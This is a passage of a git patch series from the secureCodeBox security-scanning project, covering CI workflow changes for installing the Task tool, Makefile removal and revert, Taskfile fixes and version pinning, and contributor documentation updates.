file", async () => { const jsonContent = await readFile( diff --git a/scanners/trivy/parser/parser.test.js b/scanners/trivy/parser/parser.test.js index a490acd744..99ee187c53 100644 --- a/scanners/trivy/parser/parser.test.js +++ b/scanners/trivy/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () => { const fileContent = await readFile( From b3f2b3e06fe16d10b340fdfabd5a516b19b0f7b9 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:47:30 +0200 Subject: [PATCH 125/137] Remove sdk makefiles --- hook-sdk/nodejs/Makefile | 7 ------- parser-sdk/nodejs/Makefile | 7 ------- sdk.mk | 41 -------------------------------------- 3 files changed, 55 deletions(-) delete mode 100644 hook-sdk/nodejs/Makefile delete mode 100644 parser-sdk/nodejs/Makefile delete mode 100644 sdk.mk diff --git a/hook-sdk/nodejs/Makefile b/hook-sdk/nodejs/Makefile deleted file mode 100644 index b8f588dca2..0000000000 --- a/hook-sdk/nodejs/Makefile +++ /dev/null @@ -1,7 +0,0 @@ -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -sdk = hook-sdk -include_guard = set -include ../../sdk.mk diff --git a/parser-sdk/nodejs/Makefile b/parser-sdk/nodejs/Makefile deleted file mode 100644 index 8a0ad23176..0000000000 --- a/parser-sdk/nodejs/Makefile +++ /dev/null @@ -1,7 +0,0 @@ -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -sdk = parser-sdk -include_guard = set -include ../../sdk.mk diff --git a/sdk.mk b/sdk.mk deleted file mode 100644 index 73d0a8123a..0000000000 --- a/sdk.mk +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# -# -# This include is a base for all SDK make files. - -name = ${sdk} -module = ${sdk} -include ../../test-base.mk -include ../../env-paths.mk -# Telling the env-paths file where the root project dir is. This is done to allow the generation of the paths of the -# different project folders relative to where the makefile is being run from. So BIN_DIR= $(PROJECT_DIR)/bin will be -# BIN_DIR=../../bin -PROJECT_DIR=../.. - -.PHONY: docker-build -docker-build: | docker-build-sdk - -.PHONY: docker-export -docker-export: | docker-export-sdk - -.PHONY: kind-import -kind-import: | kind-import-sdk - -.PHONY: docker-build-sdk -docker-build-sdk: - @echo ".: ⚙ī¸ Build '$(name)'." - docker build -t $(IMG_NS)/$(name)-nodejs:$(IMG_TAG) . - -.PHONY: docker-export-sdk -docker-export-sdk: - @echo ".: ⚙ī¸ Build '$(name)'." - docker save $(IMG_NS)/$(name)-nodejs:$(IMG_TAG) -o $(name).tar - -.PHONY: kind-import-sdk -kind-import-sdk: - @echo ".: 💾 Importing the image archive '$(name).tar' to local kind cluster." - kind load image-archive ./$(name).tar From 3e1bcb196873c34e176cfe17b92e5e8d9b54338f Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:48:10 +0200 Subject: [PATCH 126/137] Revert "Remove sdk makefiles" This reverts commit 399ec15a82ea453b8ca1595145e2efe9ad5e5f8b. --- hook-sdk/nodejs/Makefile | 7 +++++++ parser-sdk/nodejs/Makefile | 7 +++++++ sdk.mk | 41 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 55 insertions(+) create mode 100644 hook-sdk/nodejs/Makefile create mode 100644 parser-sdk/nodejs/Makefile create mode 100644 sdk.mk diff --git a/hook-sdk/nodejs/Makefile b/hook-sdk/nodejs/Makefile new file mode 100644 index 0000000000..b8f588dca2 --- /dev/null +++ b/hook-sdk/nodejs/Makefile @@ -0,0 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +sdk = hook-sdk +include_guard = set +include ../../sdk.mk diff --git a/parser-sdk/nodejs/Makefile b/parser-sdk/nodejs/Makefile new file mode 100644 index 0000000000..8a0ad23176 --- /dev/null +++ b/parser-sdk/nodejs/Makefile @@ -0,0 +1,7 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +sdk = parser-sdk +include_guard = set +include ../../sdk.mk diff --git a/sdk.mk b/sdk.mk new file mode 100644 index 0000000000..73d0a8123a --- /dev/null +++ b/sdk.mk @@ -0,0 +1,41 @@ +#!/usr/bin/make -f +# +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 +# +# +# This include is a base for all SDK make files. + +name = ${sdk} +module = ${sdk} +include ../../test-base.mk +include ../../env-paths.mk +# Telling the env-paths file where the root project dir is. This is done to allow the generation of the paths of the +# different project folders relative to where the makefile is being run from. So BIN_DIR= $(PROJECT_DIR)/bin will be +# BIN_DIR=../../bin +PROJECT_DIR=../.. + +.PHONY: docker-build +docker-build: | docker-build-sdk + +.PHONY: docker-export +docker-export: | docker-export-sdk + +.PHONY: kind-import +kind-import: | kind-import-sdk + +.PHONY: docker-build-sdk +docker-build-sdk: + @echo ".: ⚙ī¸ Build '$(name)'." + docker build -t $(IMG_NS)/$(name)-nodejs:$(IMG_TAG) . + +.PHONY: docker-export-sdk +docker-export-sdk: + @echo ".: ⚙ī¸ Build '$(name)'." + docker save $(IMG_NS)/$(name)-nodejs:$(IMG_TAG) -o $(name).tar + +.PHONY: kind-import-sdk +kind-import-sdk: + @echo ".: 💾 Importing the image archive '$(name).tar' to local kind cluster." + kind load image-archive ./$(name).tar From e1f6247fa4c19170eca9de645bca637bb3f0bf97 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:57:09 +0200 Subject: [PATCH 127/137] Switch task downloading to the same mechanisn that we are using for kind, kubectl and so on to avoid rate limits from github --- .github/workflows/ci.yaml | 48 +++++++++++++++++++++++++++++++-------- 1 file changed, 38 insertions(+), 10 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index c777510ff3..4a347e40c1 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -23,6 +23,7 @@ env: KIND_BINARY_VERSION: "v0.27.0" HELM_VERSION: "v3.17.3" HELM_PLUGIN_UNITTEST: "0.5.1" + TASK_VERSION: "v3.44.0" jobs: test-nodejs-scanner-test-helpers: @@ -42,7 +43,7 @@ jobs: working-directory: tests/integration run: bun test helpers.test.js k8s-setup: - name: "Setup Kind & Kubectl & Helm" + name: "Setup Kind & Kubectl & Helm & Task" runs-on: ubuntu-22.04 steps: - uses: actions/checkout@v4 @@ -62,6 +63,12 @@ jobs: curl -Lo ./helm.tar.gz https://get.helm.sh/helm-${{ env.HELM_VERSION }}-linux-amd64.tar.gz tar -xzf ./helm.tar.gz chmod +x ./linux-amd64/helm + + - name: Install Task + run: | + curl -Lo ./task.tar.gz https://github.com/go-task/task/releases/download/${{ env.TASK_VERSION }}/task_darwin_amd64.tar.gz + tar -xzf ./task.tar.gz + chmod +x ./task - name: Archive Kind uses: actions/upload-artifact@v4 @@ -80,6 +87,12 @@ jobs: with: name: helm path: ./linux-amd64/helm + + - name: Archive Task + uses: actions/upload-artifact@v4 + with: + name: task + path: ./task # ---- Unit-Test ---- @@ -110,10 +123,15 @@ jobs: run: | helm plugin install https://github.com/helm-unittest/helm-unittest.git --version ${{ env.HELM_PLUGIN_UNITTEST }} - - name: Install Task - uses: arduino/setup-task@v2 + - name: Download Task + uses: actions/download-artifact@v4 with: - version: 3.x + name: task + path: ./task + + - name: Make Task globally available + run: | + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - name: Helm-Chart Unit Tests run: task test:helm:all @@ -426,10 +444,15 @@ jobs: - name: Install bun uses: oven-sh/setup-bun@v2 - - name: Install Task - uses: arduino/setup-task@v2 + - name: Download Task + uses: actions/download-artifact@v4 with: - version: 3.x + name: task + path: ./task + + - name: Make Task globally available + run: | + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - name: Download Kind uses: actions/download-artifact@v4 @@ -573,10 +596,15 @@ jobs: - name: Install bun uses: oven-sh/setup-bun@v2 - - name: Install Task - uses: arduino/setup-task@v2 + - name: Download Task + uses: actions/download-artifact@v4 with: - version: 3.x + name: task + path: ./task + + - name: Make Task globally available + run: | + chmod +x ./task/task && sudo mv ./task/task /usr/local/bin/task - name: Download Kind uses: actions/download-artifact@v4 From 8ab8100d21e6a9c8692e547370076859f96c2d66 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:59:04 +0200 Subject: [PATCH 128/137] Correct os for the task download url --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 4a347e40c1..247a68b8ce 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -66,7 +66,7 @@ jobs: - name: Install Task run: | - curl -Lo ./task.tar.gz https://github.com/go-task/task/releases/download/${{ env.TASK_VERSION }}/task_darwin_amd64.tar.gz + curl -Lo ./task.tar.gz https://github.com/go-task/task/releases/download/${{ env.TASK_VERSION }}/task_linux_amd64.tar.gz tar -xzf ./task.tar.gz chmod +x ./task From 14a57c451825745011edea293651de7fd58222fe Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:18:29 +0200 Subject: [PATCH 129/137] Skip hook test installing if a hook doesn't have custom deps --- hooks/Taskfile.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index beeaaf0ff7..9d1bf8a56e 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -17,6 +17,8 @@ vars: additionalHelmInstallArgsForHook: '{{ .additionalHelmInstallArgsForHook | default "" }}' hasIntegrationTests: sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests" ]; then echo "true"; else echo "false"; fi' + hookUsesNpmDependencies: + sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .scannerName }}/hook/package.json" ]; then echo "true"; else echo "false"; fi' env: IMG_TAG: sh: 'echo "sha-$(git rev-parse --short HEAD)"' @@ -78,7 +80,12 @@ tasks: status: - "[ -d {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/node_modules ] || false" cmds: - - cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ && bun install + - | + {{ if eq "true" .hookUsesNpmDependencies }} + cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook/ && bun install + {{ else }} + echo "Hook has no custom dependencies. Skipping." + {{ end }} test:setup: cmds: - task: test:setup:hook-sdk From 868eff5b48060bb871d3d9bea2bede31cd70c237 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:20:08 +0200 Subject: [PATCH 130/137] Set fail fast to false for hooks Ensures that the jobs that are working keep running to easier identify if one of them is broken --- .github/workflows/ci.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 247a68b8ce..23206c5f10 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -578,6 +578,7 @@ jobs: - k8s-setup runs-on: ubuntu-22.04 strategy: + fail-fast: false matrix: hook: - cascading-scans From b91e39d9fea9f75fcb2b7eed17428fb81dcd46bf Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:33:28 +0200 Subject: [PATCH 131/137] Correct var used for dependency checking --- hooks/Taskfile.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index 9d1bf8a56e..de5467ada8 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -18,7 +18,7 @@ vars: hasIntegrationTests: sh: 'if [ -d "{{ .TASKFILE_DIR }}/{{ .hookName }}/integration-tests" ]; then echo "true"; else echo "false"; fi' hookUsesNpmDependencies: - sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .scannerName }}/hook/package.json" ]; then echo "true"; else echo "false"; fi' + sh: 'if [ -f "{{ .TASKFILE_DIR }}/{{ .hookName }}/hook/package.json" ]; then echo "true"; else echo "false"; fi' env: IMG_TAG: sh: 'echo "sha-$(git rev-parse --short HEAD)"' From 01d78fbf01cc25163a3a64c9b70561e6835d1a40 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:41:39 +0200 Subject: [PATCH 132/137] Update hook code in docs --- .../docs/contributing/integrating-a-hook/hook.md | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/documentation/docs/contributing/integrating-a-hook/hook.md b/documentation/docs/contributing/integrating-a-hook/hook.md index 542e0c8538..dfcd0b567f 100644 --- a/documentation/docs/contributing/integrating-a-hook/hook.md +++ b/documentation/docs/contributing/integrating-a-hook/hook.md @@ -35,13 +35,12 @@ When the rawResults are in form of a json file, getRawResults will return the pa ::: ```js -async function handle({ getRawResults }) { +export async function handle({ getRawResults }) { const result = await getRawResults(); // outputs string representation of the scan result file // e.g. the nmap xml output console.log(result); } -module.exports.handle = handle; ``` ### getFindings() @@ -51,12 +50,11 @@ This callback function will provide all findings to the hook as an array of find Example: ```js -async function handle({ getFindings }) { +export async function handle({ getFindings }) { const findings = await getFindings(); // logs the findings returned by the parser of the scantype console.log(findings); } -module.exports.handle = handle; ``` ### updateRawResults() @@ -76,7 +74,7 @@ If you want to perform actions on all findings consider using the `updateFinding Example ```js -async function handle({ updateRawResults }) { +export async function handle({ updateRawResults }) { // Overrides the raw results with a fixed nmap report await updateRawResults(` @@ -94,7 +92,6 @@ WARNING: No targets were specified, so 0 hosts scanned. `); } -module.exports.handle = handle; ``` ### updateFindings() @@ -112,7 +109,7 @@ If you make changes to some findings you will have to call `updateFindings()` wi Example: ```js -async function handle({ +export async function handle({ updateFindings, }) { // Overrides the findings with a fixed nmap finding @@ -162,7 +159,7 @@ Notice that the `handle()` function has to be exported to use in the _hook-sdk_ ::: ```js -async function handle({ +export async function handle({ getFindings, scan, webhookUrl = process.env["WEBHOOK_URL"], @@ -177,7 +174,6 @@ async function handle({ body: JSON.stringify({ scan, findings }) });; } -module.exports.handle = handle; ``` ## hook.test.js From 7698430facf754be1a71b0828500997c5b537cab Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:42:02 +0200 Subject: [PATCH 133/137] Remove now unused elastic mock overlooked this earlier and was confused why mocking was even working --- .../hook/__mocks__/@elastic/elasticsearch.js | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js diff --git a/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js b/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js deleted file mode 100644 index 2bc8a1c1e9..0000000000 --- a/hooks/persistence-elastic/hook/__mocks__/@elastic/elasticsearch.js +++ /dev/null @@ -1,21 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -class Client { - constructor() { - this.indices = { - create: jest.fn(), - }; - this.index = jest.fn(); - this.bulk = jest.fn(async () => { - return { - body: { - errors: false, - }, - }; - }); - } -} - -module.exports.Client = Client; From 5e97169b770150f580eaa245f0858af657d405b4 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:46:55 +0200 Subject: [PATCH 134/137] Update remaining outdated doc files --- .../contributing/test-concept/charts-test.md | 19 ++++++++++++++++--- .../contributing/test-concept/scanner-test.md | 2 +- 2 files changed, 17 insertions(+), 4 deletions(-) diff --git a/documentation/docs/contributing/test-concept/charts-test.md b/documentation/docs/contributing/test-concept/charts-test.md index 3622715e27..3e4c65938f 100644 --- a/documentation/docs/contributing/test-concept/charts-test.md +++ b/documentation/docs/contributing/test-concept/charts-test.md @@ -194,16 +194,29 @@ matches the snapshot: ### Running Tests In the helm-chart folder, run tests with: + ```bash -make helm-unit-tests +task test:helm ``` -or + +or + ```bash helm unittest . ``` + And review the output for any failures. -The `make` command will also run inside the Operator, AutoDiscovery, Scanners, Hooks or Demo-Targets root folders and tests all the Helm Charts in the corresponding folder. +To run all helm unit tests in the secureCodeBox you can use `task test:helm:all`. + +### Updating snapshots + +You can have helm unittest update the snapshots to the current values. +Handy to quickly update them an checking the results in the git diff. + +```bash +helm unittest . --update-snapshot +``` ## CI/CD Integration diff --git a/documentation/docs/contributing/test-concept/scanner-test.md b/documentation/docs/contributing/test-concept/scanner-test.md index 1d8a897e44..831772513a 100644 --- a/documentation/docs/contributing/test-concept/scanner-test.md +++ b/documentation/docs/contributing/test-concept/scanner-test.md @@ -56,7 +56,7 @@ test( ); expect(count).toBeGreaterThanOrEqual(20); }, - 6 * 60 * 1000 + { timeout: 6 * 60 * 1000 }, ); ``` For this test to be considered successful, it has to match the expected condition. In this case, the condition is that the count of the findings is greater or equal to 20. From a1cc278eacd4523ed6cd8767ca42d8338c9707d4 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 13:57:34 +0200 Subject: [PATCH 135/137] Skip cmsseek integration tests cmsseek is pending removal: #3117 --- scanners/cmseek/integration-tests/cmseek.test.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index 297ab187d6..e56b2dbf21 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -4,7 +4,7 @@ import { scan } from "../../../tests/integration/helpers.js"; -test( +test.skip( "cmseek scans old-joomla for vulnerabilities without redirection", async () => { const { categories, severities, count } = await scan( @@ -33,7 +33,7 @@ test( }, ); -test( +test.skip( "cmseek scans old-joomla for vulnerabilities with redirection", async () => { const { categories, severities, count } = await scan( From fc2314ca7dd0c4f2ff12fcb737884082b38ebf34 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 18:45:55 +0200 Subject: [PATCH 136/137] Ensure taskfile version is at least 3.44.0 Prior versions might not support all required features --- .templates/new-scanner/Taskfile.yaml | 2 +- Taskfile.yaml | 2 +- demo-targets/Taskfile.yaml | 2 +- hooks/Taskfile.yaml | 2 +- hooks/cascading-scans/Taskfile.yaml | 2 +- hooks/finding-post-processing/Taskfile.yaml | 2 +- hooks/generic-webhook/Taskfile.yaml | 2 +- hooks/notification/Taskfile.yaml | 2 +- hooks/persistence-azure-monitor/Taskfile.yaml | 2 +- hooks/persistence-defectdojo/Taskfile.yaml | 2 +- hooks/persistence-dependencytrack/Taskfile.yaml | 2 +- hooks/persistence-elastic/Taskfile.yaml | 2 +- hooks/update-field-hook/Taskfile.yaml | 2 +- scanners/Taskfile.yaml | 2 +- scanners/amass/Taskfile.yaml | 2 +- scanners/cmseek/Taskfile.yaml | 2 +- scanners/ffuf/Taskfile.yaml | 2 +- scanners/git-repo-scanner/Taskfile.yaml | 2 +- scanners/gitleaks/Taskfile.yaml | 2 +- scanners/kube-hunter/Taskfile.yaml | 2 +- scanners/ncrack/Taskfile.yaml | 2 +- scanners/nikto/Taskfile.yaml | 2 +- scanners/nmap/Taskfile.yaml | 2 +- scanners/nuclei/Taskfile.yaml | 2 +- scanners/screenshooter/Taskfile.yaml | 2 +- scanners/semgrep/Taskfile.yaml | 2 +- scanners/ssh-audit/Taskfile.yaml | 2 +- scanners/sslyze/Taskfile.yaml | 2 +- scanners/test-scan/Taskfile.yaml | 2 +- scanners/trivy-sbom/Taskfile.yaml | 2 +- scanners/trivy/Taskfile.yaml | 2 +- scanners/whatweb/Taskfile.yaml | 2 +- scanners/wpscan/Taskfile.yaml | 2 +- scanners/zap-automation-framework/Taskfile.yaml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/.templates/new-scanner/Taskfile.yaml b/.templates/new-scanner/Taskfile.yaml index 38fdec6ea6..9944d77f99 100644 --- a/.templates/new-scanner/Taskfile.yaml +++ b/.templates/new-scanner/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/Taskfile.yaml b/Taskfile.yaml index 2c427a75dd..3590ce6fc3 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" env: IMG_NS: securecodebox diff --git a/demo-targets/Taskfile.yaml b/demo-targets/Taskfile.yaml index 0a9e663caf..c182550429 100644 --- a/demo-targets/Taskfile.yaml +++ b/demo-targets/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" tasks: deploy:app: diff --git a/hooks/Taskfile.yaml b/hooks/Taskfile.yaml index de5467ada8..b55830e652 100644 --- a/hooks/Taskfile.yaml +++ b/hooks/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: demo-targets: diff --git a/hooks/cascading-scans/Taskfile.yaml b/hooks/cascading-scans/Taskfile.yaml index 88526ebea3..c1307fd720 100644 --- a/hooks/cascading-scans/Taskfile.yaml +++ b/hooks/cascading-scans/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/hooks/finding-post-processing/Taskfile.yaml b/hooks/finding-post-processing/Taskfile.yaml index 0b9ec63d4f..dbd1d3674e 100644 --- a/hooks/finding-post-processing/Taskfile.yaml +++ b/hooks/finding-post-processing/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/generic-webhook/Taskfile.yaml b/hooks/generic-webhook/Taskfile.yaml index f1868c9675..506312ea12 100644 --- a/hooks/generic-webhook/Taskfile.yaml +++ b/hooks/generic-webhook/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/notification/Taskfile.yaml b/hooks/notification/Taskfile.yaml index 5e7b9654ed..782e978bd0 100644 --- a/hooks/notification/Taskfile.yaml +++ b/hooks/notification/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/hooks/persistence-azure-monitor/Taskfile.yaml b/hooks/persistence-azure-monitor/Taskfile.yaml index 654f1653ef..8e3bc1385f 100644 --- a/hooks/persistence-azure-monitor/Taskfile.yaml +++ b/hooks/persistence-azure-monitor/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/persistence-defectdojo/Taskfile.yaml b/hooks/persistence-defectdojo/Taskfile.yaml index 599ee9f758..7fc8ed8490 100644 --- a/hooks/persistence-defectdojo/Taskfile.yaml +++ b/hooks/persistence-defectdojo/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/persistence-dependencytrack/Taskfile.yaml b/hooks/persistence-dependencytrack/Taskfile.yaml index bd5409dd74..0f5dd6e616 100644 --- a/hooks/persistence-dependencytrack/Taskfile.yaml +++ b/hooks/persistence-dependencytrack/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/persistence-elastic/Taskfile.yaml b/hooks/persistence-elastic/Taskfile.yaml index e74cd9eb28..b652974104 100644 --- a/hooks/persistence-elastic/Taskfile.yaml +++ b/hooks/persistence-elastic/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/hooks/update-field-hook/Taskfile.yaml b/hooks/update-field-hook/Taskfile.yaml index 8544832206..5013f4d600 100644 --- a/hooks/update-field-hook/Taskfile.yaml +++ b/hooks/update-field-hook/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: hook: diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index da4102e606..24f21e5397 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: demo-targets: diff --git a/scanners/amass/Taskfile.yaml b/scanners/amass/Taskfile.yaml index 37e84d28ee..20028cca46 100644 --- a/scanners/amass/Taskfile.yaml +++ b/scanners/amass/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/cmseek/Taskfile.yaml b/scanners/cmseek/Taskfile.yaml index 36562f153f..eba6d685de 100644 --- a/scanners/cmseek/Taskfile.yaml +++ b/scanners/cmseek/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/ffuf/Taskfile.yaml b/scanners/ffuf/Taskfile.yaml index 1900012ba0..b112e9f6e5 100644 --- a/scanners/ffuf/Taskfile.yaml +++ b/scanners/ffuf/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/git-repo-scanner/Taskfile.yaml b/scanners/git-repo-scanner/Taskfile.yaml index e58f01d4b6..a7b2ce668b 100644 --- a/scanners/git-repo-scanner/Taskfile.yaml +++ b/scanners/git-repo-scanner/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/gitleaks/Taskfile.yaml b/scanners/gitleaks/Taskfile.yaml index 7d33d75991..8988f3f9fd 100644 --- a/scanners/gitleaks/Taskfile.yaml +++ b/scanners/gitleaks/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/kube-hunter/Taskfile.yaml b/scanners/kube-hunter/Taskfile.yaml index e009ffdde2..cee4e0e134 100644 --- a/scanners/kube-hunter/Taskfile.yaml +++ b/scanners/kube-hunter/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/ncrack/Taskfile.yaml b/scanners/ncrack/Taskfile.yaml index eec456a8c9..832eab3ea0 100644 --- a/scanners/ncrack/Taskfile.yaml +++ b/scanners/ncrack/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/nikto/Taskfile.yaml b/scanners/nikto/Taskfile.yaml index 8987310e36..8ca7765e7d 100644 --- a/scanners/nikto/Taskfile.yaml +++ b/scanners/nikto/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/nmap/Taskfile.yaml b/scanners/nmap/Taskfile.yaml index bf57337c2a..b3b42498e0 100644 --- a/scanners/nmap/Taskfile.yaml +++ b/scanners/nmap/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml index 249f04c32f..a530451afc 100644 --- a/scanners/nuclei/Taskfile.yaml +++ b/scanners/nuclei/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/screenshooter/Taskfile.yaml b/scanners/screenshooter/Taskfile.yaml index 2f3270bd44..11e85fd93f 100644 --- a/scanners/screenshooter/Taskfile.yaml +++ b/scanners/screenshooter/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/semgrep/Taskfile.yaml b/scanners/semgrep/Taskfile.yaml index 560d7b1dec..142059348c 100644 --- a/scanners/semgrep/Taskfile.yaml +++ b/scanners/semgrep/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/ssh-audit/Taskfile.yaml b/scanners/ssh-audit/Taskfile.yaml index 423323fed1..d67db7f0ce 100644 --- a/scanners/ssh-audit/Taskfile.yaml +++ b/scanners/ssh-audit/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/sslyze/Taskfile.yaml b/scanners/sslyze/Taskfile.yaml index 7f2021f045..6c6db81f31 100644 --- 